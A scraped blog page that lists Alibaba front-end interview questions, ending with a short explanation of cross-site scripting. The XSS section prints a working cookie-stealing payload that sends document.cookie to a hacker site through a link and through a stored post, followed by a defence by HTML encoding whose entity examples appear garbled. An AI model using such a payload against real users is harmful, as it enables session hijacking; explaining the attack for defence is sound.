ali面试
来源:互联网 发布:淘宝网商城女士棉袄 编辑:程序博客网 时间:2024/05/20 15:41
1 自己介绍
2 了解的前台和后台技术
3 怎么跨域
4 有没有看过jquery源码
5 了解node.js吗?
6 从输入网址到加载到界面的过程?
7 怎么解决大数据问题。
8 HTML5技术了解。
9 有写微博的习惯吗?写些什么?
10 做过什么项目?
11 数据库了解哪些?对数据库知识学过什么?知道索引吗?
12 缓存问题。
13 amd和cmd的区别
14 图片旋转90°
15 在ul子孩子li上添加事件,该li不一定存在。
16 xss攻击
xss(Cross Site Scripting)跨站脚本攻击,恶意攻击者往Web页面里插入恶意Script代码,当用户浏览该页之时,嵌入其中Web里面的Script代码会被执行,从而达到恶意攻击用户的特殊目的。主要来自内部和外部的攻击。
1 用户A登陆网站a.com后,他又点击了某个链接,例如:http://www.a.com?content=<script>window.open(“www.b.com?param=”+document.cookie)</script>,而b.com是黑客网站,这样就得到了用户的cookie。
2 用户A和我都登陆了系统,我发表了一篇文章,文章内容有<script>window.open(“www.b.com?param=”+document.cookie)</script>,保存后,A查看该文章,则其信息会泄露给我。
防御为:对用户的输入进行过滤,把< > & "等进行转换为HTML encode,,例如
<为 < >为> &为& "为 
<script>window.location.href=”http://www.baidu.com”;</script>
转为:<script>window.location.href="http://www.baidu.com"</script>存储,在浏览器以文本形式显示。即可。
- ali面试
- ali面试
- ali视频面试总结
- 面试问题记录-ali
- Ali
- ali
- ali机顶盒
- js --ali
- ali 电面
- 回顾ali历程
- Ali实习生笔试总结
- 【实习】ali平台
- ALI OSS RequestTimeTooSkewed
- Ali 数加 - DataV
- ali Interview guide
- maven ali仓库
- Ali并发总结
- ALI的错误不少哦
- cocos2dx-Lua中关于Lua和Java的互相操作的解决方案
- linux awk命令使用实例
- 代理模式
- 显卡上DirectX 9.0 是什么意思
- 窥探Swift之使用Web浏览器编译Swift代码以及Swift中的泛型
- ali面试
- vmware虚拟机开启samba、SFTP等服务传输速度慢约30kB/s
- Ehcache整合springmvc 个人总结
- 特征提取与匹配方法
- springMVC自动获取jsp页面input中的值,封装成对象传入后台
- Caffe 源码添加多标签
- android权限清单
- Java学习第一天面向对象语言的学习
- PHP攻击防御